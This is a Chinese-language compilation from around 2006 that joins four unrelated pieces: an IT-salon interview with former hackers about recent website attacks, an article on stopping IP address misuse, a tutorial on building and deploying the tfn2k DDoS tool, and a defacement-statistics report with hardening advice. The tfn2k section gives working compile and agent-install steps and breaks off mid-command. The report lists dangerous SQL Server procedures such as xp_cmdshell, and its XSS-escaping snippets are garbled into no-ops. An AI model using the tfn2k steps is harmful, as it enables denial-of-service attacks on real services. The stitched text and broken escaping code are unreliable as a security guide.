互联网大会三天，新网、宝洁、反黑客官方网站相继被黑，再次把黑客推向前台。在黑客工具日益泛滥，黑客攻击频繁的被利用成为市场竞争手段的今天，黑客未来的走向越来越受到社会各界的强烈关注，顶尖黑客做客南方IT沙龙，网易科技为你独家解密。
[最新消息]
中国万网9月29日晚遭黑客大规模攻击

[近期黑客事件回顾]

宝洁中国网站被黑客攻破 留言要求SK-II滚出中国

域名服务商新网遭黑客攻击 约20%中国网站瘫痪

黑客公然叫嚣"黑客在此" 百度新网不是最后一个

百度遭史上最大规模黑客攻击 搜索报障30分钟

嘉宾：
谢朝霞 深圳安络科技副总裁
陈三堰 广州易城科技总经理
主持人：
网易财富中心总监：刘红鹰
网易科技：古丰

提醒：网友可以点击这里 到南方IT沙龙论坛与嘉宾互动和交流

比尔.盖茨也算得上黑客
古丰：最近黑客话题很火爆，在刚结束的2006中国互联网大会期间，三天内新网、宝洁、反黑论坛接连被黑了，为什么最近会出现这么多黑客行动呢？今天南方IT沙龙第六期非常荣幸请来了中国第一第二代的“黑客代表性人物”谢朝霞和陈三堰，当然了，黑客早年是爱国主义、网络高手的代名词，现在黑客往往被赋予更多负面的含义，今天两位嘉宾也早已经告别的所谓的黑客生涯，并在各自领域上有自己的成就，但相信两位对最近频频爆发的黑客事件有比较深刻的理解，我们先让两位简单介绍下自己。
谢朝霞：今天来广州首先感谢网易科技给我这个平台，我首先发表下声明，在中国，黑客这词已经被滥用，相信现在我已经可以作为为网络安全代表方来谈黑客这个话题。在2001年网络泡沫破裂后，一度出现很困难的情况，我们坚持下来把网络安全作为主营业务。现在困难已经过去，产业的前景不错。
刘红鹰：谢朝霞以前在江湖上的名号叫什么？
谢朝霞：老毒物是我早期聊天室的网名，后来传开了成为我的代号。
陈三堰：我来自第八军团，99年创办，感谢网易科技今天提供的机会。关于黑客，这个词已经被滥用了，我深有同感，现在也不想提到这个词语，一般人认为黑客是很神秘的人物，偷QQ，黑网站等，实际上真正的黑客不会这样做的。我的网名是陈三公子，99年华南理工大学毕业，之后做过老师，后来由于崇拜电脑报里的陈三公子，取这个名字也是因为崇拜，目前主要从事网络安全行业。
刘红鹰：很有个性的两位家宾，从你们的个人经历开始向我们的网友讲解下如何？
谢朝霞： 很有必要在开始讨论前，对黑客这个词做个定义和划分，HACKER本意是做一件漂亮事件的人。公认为互联网最早的HACKER是写操作系统的人，包括比尔.盖茨等人，他们是最早对互联网做出贡献的人，也能称得上黑客。目前黑客有三种类型是公认的，一是对网络有贡献的人，二是发现漏洞的人，三是利用攻击手段的人。白帽子是做兵器的，黑帽子是用兵器去杀人的。还有介于中间的灰帽子。网络安全公司里有很多曾经被称为黑客的人，他们不是金盆洗手，他们是把自己的技术应用在对社会有益的地方。他们是白帽子。还有发现漏洞，促使厂商发布补丁的也是正义的黑客。
陈三堰：对于谢朝霞对黑客的定义，我基本认同。刚才说的，黑客注重工具，这点实际上很多黑客也非常注意对于漏洞的研究及工具的制作,可能对于骇客来讲对于黑客工具的依赖会比较强.
刘红鹰：今天很有意思的细节是，二位被称为黑客，却都穿着白衣服，是不是有意告诉别人你们不是黑客？如果现在叫你们黑客，你们愿意么？
陈三堰：实际上我更欣赏的是黑客的学习态度及研究的精神.但是并不因此就可以称之为黑客,我们也是在经历一个学习的过程,别人认为我们是黑客,而自己感觉可能离心目中的黑客距离还很远,这与每个人心中对黑客的理解有关。

中国有500万黑客 攻击百度小孩也能做到
刘红鹰：在普通网友心目中，黑客更多的是攻击者，拿到数据的和黑帮等，可能这些人的行为会被认为在现实社会中的所不能表达的抗议的行为，在中国，这些情绪，生存的压抑，未来的走向，二位是不是可以描述下中国的黑客的发展历史经历了或正经历着什么变化？
陈三堰：中国的黑客出现在95年，那时才是真正意义上的黑客，后来可能又出现了为体现技术的黑客，最近居然出现了犯罪的黑帮，给你发邮件，恐吓你。社会的发展，导致黑客不再象以往那样单纯以技术为目的，而更多的是为了金钱来行动。当然也有最近的事件，是没有任何目的的趋势。黑客现在缺少正确的引导，网络上很多工具，普通人都可以学会相关教程，黑客工具如果被小孩子们学会，如果没有正确的引导，这部分群体就会走向极端。目前我们所看到的，基本都是小孩子们在玩游戏，黑掉网站，挂上自己的QQ，我们看来，这样的行为很搞笑
古丰：您觉得百度、新网是小孩子们能黑的吗？
陈三堰：有些小孩子们可以完成，有很多小孩子手上有很多肉鸡，他们利用很多“肉鸡”发起拒绝服务攻击。前几天反黑官方网站被黑，就是一个小孩子做的，他给我发过图片显示过他的成果,“拥有肉鸡近三千台”，他觉得很有成就感。
古丰：为什么会在2006中国互联网大会三天每天就有一个网站受到黑客攻击呢？会不会是一种有计划有预谋的集中攻击行为？
陈三堰： 新网被黑我不大清楚具体细节，关于为啥选择再大会期间发动密集的攻击行为，可能有人是为了故意制造新闻，这样才能广受关注。
谢朝霞：关于具体事实和情况我不大清楚。从我的经验来看，攻击每时刻都在发生，我觉得互联网大会期间巧合的可能性更大。
刘红鹰：您们被江湖中称为第一代第二代的黑客，你什么时候被称为黑客的，从你的经历来看，黑客会往什么方向发展？
谢朝霞：我不清楚谁给我封上南帝的封号，我唯一的特点可能是从事业内的人中年龄大点。从事安全行业，不可能不对攻击有所了解。我说过黑客分三种。只说白帽、灰帽、黑帽。白帽子黑客的发展将来更多的会在技术上和产品上提供价值。白帽子完全有能力去银行调动数据库，但这是违法的，用同样的能力不如把自己的公司做大。我相信网络安全这个行业会越来越重要，比如电子政务，网上银行，网络游戏，对于网络安全要求很大，因此白帽子的利润空间很大。目前来讲，全球具备攻击能力的人有2000万，按3％－5％比例来算，中国黑客数量也差不多有300-500万。
刘红鹰：一般的攻击手段很多，都有什么，怎么防范？
陈三堰一般设备上有，操作系统，还有第三方软件都有漏洞，或者服务器上放置的程序都有漏洞，都可以被攻击，一般常用的手段可能是拒绝服务，这个是缺陷，可修改为:网络设备漏洞，操作系统漏洞，还有第三方软件漏洞，或者服务器上放置的程序都有漏洞，都可以被攻击，一般常用的手段
可能是拒绝服务，这个是网络协议本身的缺陷。中国的网站很脆弱，目前包括电子政务方面，安全意识很差。而另一方面来说，一些黑客，会在发展遇到障碍的时候，会转行做其他。
有钱的企业最容易受到攻击
刘红鹰：继百度、新网之后，谁最可能成为下一个被攻击的目标？
谢朝霞：有钱的网站和有钱的公司。
刘红鹰：是原生态的人做的还是公司的人做的？
谢朝霞：按目前安全状况来说，因此攻击的成本会越来越高，目的性越来越强。将来从底层攻击的难度会加大，从应用层攻击的会更多，邮件，应用程序，脚本等等方面。面对应用，就要对应用进行研究。因此攻击的成本会很过，目的性更高。
古丰：百度被黑的成本多高？如果你是百度的CTO你会怎么应对？
谢朝霞：更准确说，百度事件是堵塞，这个成本并不是很大的。百度对一般的拒绝服务攻击应该可以化解的。他们有财力。我们安全服务中有这样的服务。如果我百度CTO，一我要加大对主机和安全的投入，二要做好应急措施。这样的攻击是消耗战，你有不同的预案，是可以防范的。对于黑帽子，肯定越来也越多，因为网络应用和空间越大，更多的利益会促使更多的黑帽子发起对商家、个人、组织去下手。
黑客攻击是行侠仗义还是利益驱动
刘红鹰：百度被黑的事情，大家都觉得是正义的表现，二位觉得中国的黑客这样的行为更多的是正义的行为还是经济上的目的？

陈三堰： 对百度的了解来说，从前段裁员说，很多人觉得是值得同情的，应该发泄，SK-II也是这样被黑，可能有些高手会表达这样的愤怒的心情。大部分来说，很多高手都有正义感的，但有些事情不是一般小黑客能做的。当然，也越来越多黑客不再象以往那样单纯以技术为目的，而更多的是为了金钱来行动。
谢朝霞： 我认为百度被攻击的事件，从目前法律定义来看，国际上是被定义为恐怖行为的，中国已经加入这个协定的，有义务要进行调查的。对于黑帽子，肯定越来也越多，因为网络应用和空间越大，更多的利益会促使更多的黑帽子发起对商家，个人，组织去下手。无论什么原因，去攻击一个网站，这个做法是不可取的，目前我国对攻击网站等黑客行为的查处和打击力度在加大，有攻击能力的其行为稍有不慎可能会成为公安部门的查处对象。如果被攻击方足够有钱，愿意花代价的话，即使拒绝服务攻击，也是甚至可以查出来的。
黑客攻击成为市场竞争手段
观众提问：前段时间各大网站被黑事件，我个人认为有炒作的原因。我所了解，很多做网站的人都被攻击的话，被攻击的流量很大，这样的攻击是机房控制呢还是肉鸡比较多呢？
谢朝霞： 您讲的这个情况，我们有过了解。这样的行为往往是网站经营者之间互相攻击的，办网站的人有很好的带宽，甚至会花钱去攻击他们的竞争对手。可能是有组织的，起因还是商业竞争。
观众：如果是竞争对手攻击，现在新浪、搜狐、网易三大门户也好，搜索巨头百度、google等竞争对手很多，他们应如何面对黑客威胁？
谢朝霞： 我的亲身经历，2000初，我正在融资，那天就有人攻击我，我正演示给投资商看的时候就被攻击，后来我恢复后，攻击持续了一个月后停止，由此，我认为只要被自己的防范做好，就可以了。攻击时间太长长，就容易被查出来。

陈三堰： 我们的防火墙每秒都被人检测入侵，我们不知道是谁，只能自己采取措施去防范，往往有时候攻击也就持续一个月就会停掉。有客户找我们，有损失的，但是对于拒绝服务方面还是办法很少。我们有句话是，只有绝对的不安全，没有绝对的安全。
黑客还会为爱国挺身而出吗？
观众提问：政府如果需要黑客们保家卫国，黑客还会不会像中美黑客大战那样站出来？
谢朝霞： 从我们公司来讲，我们只是做到培训，防范，分析，技术发现。我觉得做到这一点，已经足够了，我们提供了防范手段，告诉了客户用途和手段。个人来讲，我也只会做到培训。
陈三堰：个人来说，特殊时期，你年轻的时候，可能会做些，成年时，除非特别需要，可能会考虑协助。这个问题有些尖锐，私聊更合适。对于爱国情感，每个人都会有的。
谢朝霞： 我要补充，您的问题有猜测。据我了解，只要国家不打仗，就没有网络上的行为。所有的目前的行为，都是个人行为。和平时期，做攻击行为的法律我国与其他国家一样，是有规定的，不可能有组织的。一般的攻击都是个人行为。
网络安全太昂贵 中小企业怎么保护自己
观众提问：我对黑客没认识，没兴趣，但我有个问题，二位多在网络安全方面的公司，网络安全只给国家，给能出得起钱的企业做，但对我们小企业来说，成本太高了，二位你们经营的企业，你们的客户群是怎样定位，我们没有财力的公司，能提供给我们什么服务，给我们什么建议？
谢朝霞： 安全是要成本的，先问你，你能出多少钱？
观众提问：需要看我们付出安全的成本与我们不做安全付出的代价哪个高？你们的服务适合什么人群？
谢朝霞： 您愿不愿意投入您的成本的10-15%来做网络安全。
观众：初期不会，发展大了会，正如正版软件一样，开始不会，公司大了不得不用。
谢朝霞： 我们的服务里有为中小企业服务的，一个月不会超过几百块，基本上满足中小企业的安全需求。行业运营的平台，也差不多可以做的。服务有软件加重大事件上门服务，一般事件的电话支持。
刘红鹰：有一个安全成本的问题，到底一个企业要多少安全成本可以得到安全保障？
陈三堰：很多创业型企业需要考虑很多，公司小的时候，觉得安全成本过高不愿做，大了就不会选择我们这些较小规模的网络安全公司。国内有300多家安全企业走的高端路线，低端服务走的还是很少，可能跟利润少有关系。对于安全厂商，确实很不好做。
刘红鹰：中国安全产业的市场有多大？
陈三堰： 据CNNIC最新公布的调查数据，截止2008年，中国安全市场达105亿。
刘红鹰：转型做安全工作以后，你们现在活得好么？
谢朝霞：现在企业投入的都不一样，很多小企业很少甚至没有，而很多大企业的投入很大甚至浪费。但总体来说，安全市场我们追求的是IT市场5%-10%。
刘红鹰：有黑客放出话，国内几大网站一夜间会被黑掉，有可能吗？
陈三堰：如果说用比较高级拒绝服务来实现或许有可能，这会考虑到"黑"到一个什么样的度,而局部一个小程序，可能是会找到漏洞，但整体被黑掉，是很难的。整个互联网还是很脆弱的，美国科学家的一项研究表明，似乎无所不能的互联网，却有着"阿克琉斯之踵"，只要几个关键环节被破坏，整个互联网将在瞬间瘫痪。[阿克琉斯是希腊神话里的无敌英雄，可一旦被射中右脚后跟，就会訇然倒地，软弱无力。]新网这次就是一个典型案例。
谢朝霞： 网络应用和网络安全一定要投入成本，安全是可以得到很大保

在大多数局域网的运行管理工作中，网络管理员负责管理用户IP地址的分配，用户通过正确地注册后才被认为是合法用户。在局域网上任何用户使用未经授权的 IP地址都应视为IP非法使用。但在Windows操作系统中，终端用户可以自由修改IP地址的设置，从而产生了IP地址非法使用的问题，改动后的IP地址在局域网中运行时可能出现种种情况。
　　1）非法的IP地址即IP地址不在规划的局域网范围内。

　　2）重复的IP地址与已经分配且正在局域网运行的合法的IP地址发生资源冲突，使合法用户无法上网。

　　3）冒用合法用户的IP地址。当合法用户不在线时，冒用其IP地址联网，使合法用户的权益受到侵害。

　　实际上，IP地址的非法使用问题，不是普通的技术问题，而是一个管理问题。只有找到其存在的理由，根除其存在的基础，才可能从根本上杜绝其发生。分析非法使用者的动机有以下几种情况：首先是干扰、破坏网络服务器和网络设备的正常运行；其次是企图拥有被非法使用的IP地址所拥有的特权。最典型的，就是因特网访问权限。最后是因机器重新安装、临时部署等原因，无意中造成的非法使用。

非法使用方法

　　静态修改IP地址配置时，用户在配置TCP/IP选项时，使用的不是管理员分配的IP地址，就形成了IP地址的非法使用。而修改MAC地址和IP地址时，非法用户还有可能将一台计算机的IP地址和MAC地址都改为另一台合法主机的IP地址和MAC地址。他们可以使用允许自定义MAC地址的网卡或使用软件修改MAC地址。当然也有比较恶劣的使用，是IP电子欺骗。其通过编程来伪造某台主机IP地址，从而躲避相关机关的调查。
解决方法　　

静态ARP表的绑定

　　对于静态修改IP地址的问题，可以采用静态路由技术加以解决，即IP-MAC地址绑定。因为在一个网段内的网络寻址不是依靠IP地址而是物理地址。IP 地址只是在网际之间寻址使用的。因此作为网关的路由器上有IP-MAC的动态对应表，这是由ARP协议生成并维护的。配置路由器时，可以指定静态的ARP 表，路由器会根据静态的ARP表检查数据包，如果不能对应，则不进行数据转发。该方法可以阻止非法用户在不修改MAC地址的情况下，冒用IP地址进行跨网段的访问。

交换机端口绑定

　　借助交换机的端口，MAC地址绑定功能可以解决非法用户修改MAC地址以适应静态ARP表的问题。可管理的交换机中都有端口-MAC地址绑定功能。使用交换机提供的端口地址过滤模式，即交换机的每一个端口只具有允许合法MAC地址的主机通过该端口访问网络，任何来自其它MAC地址的主机的访问将被拒绝。

VLAN划分

　　严格来说，VLAN划分不属于技术手段，而是管理与技术结合的手段。将具有相近权限的IP地址划分到同一个VLAN，设置路由策略，可以有效阻止非法用户冒用其他网段的IP地址的企图。

结合身份认证

　　避免采用针对IP地址的直接授权的管理模式，综合运用用户名、口令、加密、VPN及其他应用层的身份认证机制，构成多层次的严密的安全体系，可以有效降低IP地址非法使用所带来的危害。

管理建议

　　在网络管理员完成上述堵截非法IP地址设置之后，还需要从管理观念上进行新的培训。比如要使普通用户明白非法使用IP地址所产生的危害和处罚措施，制定并实施严格的IP地址管理制度，包括：IP地址申请和发放流程，IP地址变更流程，临时IP地址分配流程，机器MAC地址登记管理，IP地址非法使用的处罚制度。

　　此外，还要尽量使用简单、易于管理的网络肝利系统，不仅可以完成日常监视和日志功能，同时还要及时有效的发现网络中的 IP地址变化、MAC地址变化、交换机端口改变等异常行为，帮助网络管理员查找网络故障的根源。这样，网络管理员还可以借助网管系统，很方便的管理网络交换机，针对个别问题突出的用户，进行交换机端口绑定操作，禁止其修改MAC地址。

　　总之，如果单纯应用技术手段来防范IP地址的非法使用，系统投资成本和人员开支相对较大，所以在技术+管理，才能实现高可靠性的系统运行与低成本的管理维护的统一。

首先，我写这篇文章的目的，并不是我想成为什么hacker之类，而且我不并不鼓励任何人利用它来做一些有损他人的事情，我只是想多一些人关注网络安全，共同研究并防御DOS。因为我是深受其害:(，所以，这篇文章仅用于技术参考，供大家研究DDOS防御之用。如果你利用它来 做一些不合法的事情，那结果与我无关。

拒绝服务攻击（DOS，Denial Of Service)可以指任何使服务不能正常提供的操作。如软件bug,操作失误等。不过现在因为失误操作而造成的dos，可能性非常小，更多的是恶意的攻击行为。现在拒绝服务攻击早已演变为分布式拒绝服务攻击(DDOS,Distributed Denial Of Service),利用更多的代理集中攻击目标，其危害更大。

我们大家都知道tcp/ip协议现在已经成为整个internet框架协议，可以说，如果没有tcp/ip，至少internet不会像现在这样普及，甚至不可能会有internet。但凡事皆有两面性，tcp/ip使我们大家受益，同时因为协议本身构造的问题，它也成为别人攻击我们的工具。我们以tcp三握手建立连接的过程来说明。

一。tcp syn flood

1.客户端(client)发送一个包含SYN(synchronize)的tcp包至服务器，此数据包内包含客户端端口及tcp序列号等基本信息。

2.服务器(server)接收到SYN包之后，将发送一个SYN-ACK包来确认。

3.客户端在收到服务器的SYN-ACK包之后，将回送ACK至服务器，服务器如接收到此包，则TCP连接建立完成，双方可以进行通讯（感觉像，一拜天地...二拜高堂...送入洞房...哈哈）
问题就出在第3步，如果服务器收不到客户端的ACK包，将会等待下去，这种状态叫做半连接状态。它会保持一定时间(具体时间不同操作系统不同),如果SYN请求超过了服务器能容纳的限度，缓冲区队列满，那么服务器就不再接收新的请求了,其他合法用户的连接都被拒绝掉。这种攻击往往事半罪倍，杀伤力超强。

当然，DOS攻击的方法多种多样，如:UDP flood,ICMP/Ping,ICMP/SMURF...,具体原理的介绍大家可以到http://www.chinaitlab.com/www/special/ciwddos.asp去看看，有很详细的原理及常用攻击软件介绍。不过说到DOS攻击软件，最具代表的莫过于tfn2k (Tribe Flood Network 2000),其作者是德国大名鼎鼎的mixter( 其主页http://mixter.void.ru/papers.html),好像最近正在埋头搞什么tfn3k，哎~~，不知道又有多少人寝食难安了...

二.tfn2k攻击原理

1.tfn2k的攻击体系。

tfn2k应该算是DDOS攻击中的代表作，其所能实现的功能让人瞠目结舌，叹为观止...(对它的敬畏有如滔滔江水，延续不绝...)来看看它的架构。

主控端---运行tfn客户端，来遥控并指定攻击目标，更改攻击方法.(罪大恶极)

代理端---被植入并运行td进程的牺牲品，接受tfn的指挥，攻击的实施者.需要注意的是，一个攻击者，往往控制多台代理来完成攻击，而且其系统多为unix,linux等.(可怜的牺牲品）

目标主机---被攻击的主机或网络，曾经被DDOS的有Yahoo、Amazon、CNN、e-bay等.(最大的受害者，郁闷如我)

2.tfn2k特性。

◆ 主控端通过TCP、UDP、ICMP或随机性使用其中之一(默认.随机)的数据包向代理端主机发送命令,攻击方法包括TCP/SYN、UDP、

ICMP/PING、混合攻击、TARGA3等。

◆ 主控端与代理端的通讯采取单向，即主控端只向代理端发送命令，并且会采取随机的头信息，甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息.

◆ 所有命令经过cast-256算法加命,其关键字即编译程序时的输入的口令.并且这个口令做为唯一认证凭证.

◆ 利用td进程，主控端可以远程执行shell命令.

◆ td进程的名称可以在编译时更改,更便于隐藏.

◆ tfn可以编译运行于win32及linux系统的.

...

至于伪造源IP地址等功能，更是基本功能，并且其与老版本的tfn相比，它的发包效率更高，我自已的测试，在短短不到5分钟，两台代理机，使我的redhat linux 9.0系统瘫痪.

三.tfn2k 实战测试

1.测试环境:

软件：redhat linux 9.0

硬件平台：

master:

IP: 192.168.0.6

PIV2.4/256*2/rtl8139

Ag1 :

IP: 192.168.0.2

PIV2.4/256*/rtl8139

AG2 : IP: 192.168.0.3

pIV2.6/512*2/3c905

AIM: 192.168.0.5

pIV2.66c/512*2/3c905

switch: D_link des 1024R

1.下载tfn2k.tgz(因为此软件非比寻常，所以我并不提供下载地址，如果有兴趣，自已到网上找吧)

2.解压： tar zxvf tfn2k.tgz

3.修改文件

A. src/Makefile 如果你的系统是linux系统，不需要做任何修就可以，如果是win32系统，请将

# Linux / *BSD* / Others

CC = gcc

CFLAGS = -Wall -O3

CLIBS =

这几行注释掉,并将

# Win32 (cygwin)

#CC = gcc

#CFLAGS = -Wall -DWINDOZE -O2

#CLIBS =

这几行的注释去掉.因为我的测试系统为redhat linux 9.0所以并未做任何修改.

B. src/config.h ，默认的就可以用，如果感兴趣，可以照其注释信息进行调整。

C. src/ip.h 这里要做一些修改，否则编译会有错误，发生重复定义。

/*struct in_addr

{

unsigned long int s_addr;

};*/

注意啊~~我可是将它放在"/* */"之间，也就是注释掉了:)

D.更改编译器：

因为tfn2k支持的是egcs-1.1.2-30,而redhat linux 9.0所包含的是gcc-3.2.2-5,所以如果不替换掉gcc，tfn2k是编译不过去的.需

要注意的是，更改之后，有可能会造成基于gcc3.2.2的软件编译不去,请谨慎而行.

方法很简单的，找到一张redhat linux 6.2安装盘,将egcs-1.1.2-30.rpm、cpp-1.1.2-30.rpm拷到~/

cd /mnt/cdrom/Redhat/RPMS

cp egcs-1.1.2-30* cpp-1.1.2-30* ~/

安装cpp rpm -Uvh --nodeps --oldpackage cpp-1.1.2-30.i386.rpm

安装egcs rpm -Uvh egcs-1.1.2-30.i386.rpm (如果提示有误，用nodeps、oldpackages、ignoreos等参数忽略过去就是了）

4.编译tfn2k

cd tfn2k/src

make

首先会谈出一个声明，你必须接受，之后会提示输入8-32位密码,前边提到过，这是唯一的认证凭证，会被分发于td进程中，所以一定

要记牢噢~。

编译通过后，会产生td及tfn，这就是大名鼎鼎的tfn2k啦~,td是守护进程，用来安装在代理中的，而tfn就是控制端.

5.安装td.

将td上传到我的两台代理,ag1(192.168.0.2)和ag2(192.168.0.3) ，因为我只不过测试，所以用的是合法的root来上传并执行td进程的，如果真要找到并安装一个代理，你可能得费点儿神，因为没有一个管理员会说"come on baby ~~.我给你root,来安装td做代理吧"

[root@test /] ftp 192.168.0.2

Connected to 192.168.0.2.

530 Please login with USER and PASS.

530 Please login with USER and PASS.

Name (192.168.0.2:root): wjpfjy

331 Please specify the password.

Password:

230 Login successful. Have fun.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> put td (上传td)

local: td remote: td

227 Entering Passive Mode (192,168,0,3,198,225)

553 Could not create file.

ftp> by (退出ftp)

221 Goodbye.

[root@test /]ssh 192.168.0.2 登陆到ag1 以执行td ,注意，

中国被黑站点统计系统 2006年9月分析报告
[ Zone-H.Com.Cn ] Analytical report in September 2006

来源：中国被黑站点统计系统[http://www.zone-h.com.cn]
amxku[amxku_at_msn.com]
自在轮回[zizailunhui_at_msn.com]
wayking[wayking_at_hotmail.com]
目录
0- 总述
1- 分析
2- 相关防护
3- 总结

0- 总述

根据我们对中国被黑站点统计系统所有数据的分析，截至2006年9月19日0时，被篡改网站数量已达13000多个（其中有很多网站是多次被篡改），平均每天约有25个站点被篡改且被举报；又据CNCERT/CC（国家计算机网络应急技术处理协调中心）统计，2006年3月，全球被篡改网站数量超过3万个，平均每1.5分钟，就有一个网站被篡改…… 这些数目不是危言耸听。
网站篡改就发生在我们身边：
2006年03月12日，河北省政府采购网被篡改；
2006年03月18日，广州外事办网被篡改；
2006年03月11日，洛阳大学网站被篡改；
2006年04月13日，大冶政府网被篡改；
2006年04月10日，搜狐CS站被篡改；
2006年05月09日，网易社区被篡改；
2006年07月03日，雅虎中国被篡改；
2006年07月03日，163竟价广告联盟被篡改；
2006年07月11日，网易2006 世界杯足球公园被篡改；
2006年07月22日，天津中医药大学网站被篡改；
2006年09月14日，TCL通讯科技控股有限公司网站被篡改；
2006年09月16日，蒙牛、伊利两大国内牛奶集团官方网站被篡改；
…………
其间，国内有多个网络安全站点、组织也难逃厄运。被篡改的网站多为政府、学校、信息综合门户、知名企业等影响力高、受众面广的网站……，且不论黑客攻击的动机，仅在后果上，这些网站可谓遭遇了不同程度的尴尬。在众多被篡改的网站中，政府网站成了重灾区。在今年召开的中国计算机网络安全应急年会上，国家计算机网络应急技术处理协调中心副总工程师杜跃进博士谈到，“根据中心统计，网页篡改去年在大陆发生13000多次，其中六分之一攻击对象是政府网站，对电子政务构成严重威胁” 。频频发生的攻击能否给政府网站网络安全敲响一次“警钟”。

1- 分析

经过对统计数据的分析，对被篡改的主要原因做以下诠释：
1、网站脚本程序安全问题；
2、服务器设置问题；
3、社会工程学；
4、不可预见的问题。

网站脚本程序安全问题
网站脚本程序安全问题，网站管理员对脚本程序没有做任何处理，表现在网站的默认数据库，默认管理帐号，如admin，root，manager等
网站程序设计存在安全问题，网站程序设计者在编写时，对相关的安全问题，没有做适当的处理，诸如SQL注入，上传，跨站等。
服务器设置问题
服务器设置问题导致被入侵，如系统安装优化与补丁，0day，策略问题，权限，Serv-U，SQL Server，PCangwhere 等相关设置。

社会工程学
现在管理员素质参差不齐，作好对员工自身素质的培训与内部协调，培养员工的保密意识和安全意识。制订完善的保密制度和保密机制，对不同级别的信息保密级别，设置不同的保密应急机制。

不可预见的问题
未知漏洞，本人能力有限，对此不做描述。

2- 相关防护

1. 系统问题
对于系统设置方面这里不做过多介绍。
补丁问题，这个是比较重要的问题，一般服务器需要开的服务，排除第三个程序，关闭不用的一些服务。微软的自动更新功能，另外有一个重要的地方就是，微软的补丁只不是一处，还有很多管理员经常忽略某些方面，比如OFFICE等等，几年前的溢出，时至今日还依然有效。这里不得不提醒一下管理员，想问题要从总体上来考虑，不要局限于某个细节，有个全局观。

2. 策略问题

这里包括密码策略，账户策略等等。这里对于密码，可以采用策略，密码定期更改，密码长度限制，更改默认的用户组等等。同时采用TCP/IP策略对没有端口进行限制，还有IPSEC对特定端口进行身份验证。
一般情况下，比较好的方法是对外只开两个端口，一个是80端口，一个是代理端口。代理端口加上高强度的密码，对于FTP，其它等端口，可以采用连接上代理后，用SockCap等工具来连接；对于Serv-U可以更改本地密码，端口，改更启动权限等。这样可以一定程度上防范一些来自0day的攻击，如Serv-U溢出等。当然，这里所谓的策略并不只是这么几个，需要管理员灵活利用。
设置屏幕保护密码，很简单也很有必要，设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。注意不要使用OpenGL和一些复杂的屏幕保护程序，浪费系统资源，让他黑屏就可以了。还有一点，所有系统用户所使用的机器也最好加上屏幕保护密码。
系统所能提供的安全机制，对于防范系统有着很重要的意义。

3. 权限问题

一个是目录权限问题，一个是系统自带的程序权限问题。
目录权限，要注意的是系统盘有些默认是执行权限的，所以需要设置成没有执行权限。程序主要是对cmd.exe，cacls.exe，ftp.exe，net.exe，net1.exe，tftp.exe，tftpd.exe，cscript.exe……等等，所以可能用到的东西都进行设置，另外要注意完整性，例如net.exe，最好用dir /s net*.exe，系统自带的有好多个，如果你只限制一个的话，其它的照样可以用，这样一来还是会影响到系统的安全。具体设置请参见相关的文档。
SQL Server 可以删除一些危险的内置存储过程； 以下列出危险的内置存储过程：
xp_cmdshell
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
ActiveX自动脚本：
sp_OACreate
sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty
sp_OAGetErrorInfo
sp_OAStop
限制SQL用户的权限，防止被列目录 等。

4. WEB安全问题

为每个站点设置单独的启动用户，删除不常用到的ISAPI的类型，采用iis防火墙做相关的限制等。
常见的攻击，诸如注入，暴库这类问题，可以在每个网页写个发邮件的脚本，当有出现500，403错误时，自动向管理员信箱里放送一封邮件，这样可以有针对性的对寻找对应网页，目录等启到一定的防护，同时对一些常见的页面，采用屏换的方式，这样一来可以解决一些来自暴力破解和注射时提供的一些敏感信息。
不要忽略了默认数据库等这类低级错误。
对于SQL注入可以加防注入系统，过滤特殊字符等，可以起到一定的防护作用。
跨站相关防护处理，转义相关字符，如
A
SP
str=replace(str,"&","&")
str=replace(str,":","：")
str=replace(str,"=","=")
str=replace(str,"< ","<")
str=replace(str,">",">")
str=replace(str," "," ")
str=Replace(Str,"""",""")
PHP
str_replace("\n", "
", $content);
str_replace("\t", "    ", $content);
str_replace("", "", $content);
str_replace("< ","<", $content);
str_replace(">",">", $content);
str_replace("\t", '    ', $content);
str_replace("chr(10)","", $content);
………………
对于后台最好做身份限制，另外对上传目录做没有执行权限设置，这里要注意的就是不要忽略了其它脚本语言的支持，对于Access数据库，我们建议，把数据库放在web根目录的上方，这样，即使插了马也没法提交shell。
对于web还有一个比较重要的地方就是对组件的选择性控制，FSO,Shell.Application等组件，可以采用选择性的删除或改名，例如FSO，如果不是虚拟机的话，个人认为可以选择删掉。
如果是PHP的站点的话，在条件允许的情况下，开启安全模式。
总之，要根据具体情况而定，管理员可以随机应变。

5. 0day的攻击

对于0day的攻击，目前来说我们能做的东西很少，可以选择采用监控的方式来对系统进行控制，对于日志文件，请不要给于删除的权限，这样可以从一定程度上得到被入侵后的相关信息，以便日后追击入侵者等。

6. ARP(地址转发协议)欺骗

利用协议的不足，在交换网络的混杂模式下，通过嗅探可以到一些很重要的数据，诸如明文的SQL Server密码，http数据包，SMTP，FTP等等。通常我们可以采用将MAC卡和IP绑定，但是在真实网络环境，有好多管理员并没有把mac卡和ip真正绑定好。或改用HTTPS方式访问，可以对ARP欺骗启到一定的限制。详情可以参考相关文档。

7. 社会工程学、钓鱼

举一个例子(此例来源linzi[B.C.T])说明:
有一天有一个人收到了一个信息，说他中了QQ的大奖，将一个QQ号1234567，密码是1234567，然后叫中奖者速修改密码，从这里，如果我是中奖者一般不会怀疑什么，因为他没有从我身上得到些什么，但，当中奖者把密码改完后，发现自己QQ被盗了，究其原因，钓鱼者利用了，很多人的一个弱点，就是使用同一个密码的习惯，当中奖者将密码改完后，钓鱼者去官方去查改后的密码，再用改后的密码去试中奖者的QQ，成功的话，用户的很多隐私被窃取，虚拟财产受侵犯.当然现在的QQ没法查改后的密码，我这里主要是提出一种思路.转到社工，问问你自己，是否在很多论谈使用差不多相同的ID，是否密码只有三个以内，你的ID是不是可以被google搜出来，攻击者可以攻入你注册过的站点，收集到你一定的密码档，然后，通过已收集的资料，做成一个字典，再对你进行暴破.个人建议自己的密码最好能弄进算法，个个密码都做到不同，这样一来，不只是对自己的隐私起保护作用，同时也保护了站点，域等的安全性。

3 总结
这里我们可以看出很多的安全问题，都出于管理员对网络安全没有深入的认识。
建议网站管理员，多关注网络安全相关动态，了解入侵者常用的入侵手段，以做好即时防护措施，把风险降到最低。
这里我们只是对当前统计得到的数据做了简单的分析，并不通用，具体情况及实施办法请参见相关技术文档。

由于本人的水平有限，有不妥之处还望斧正。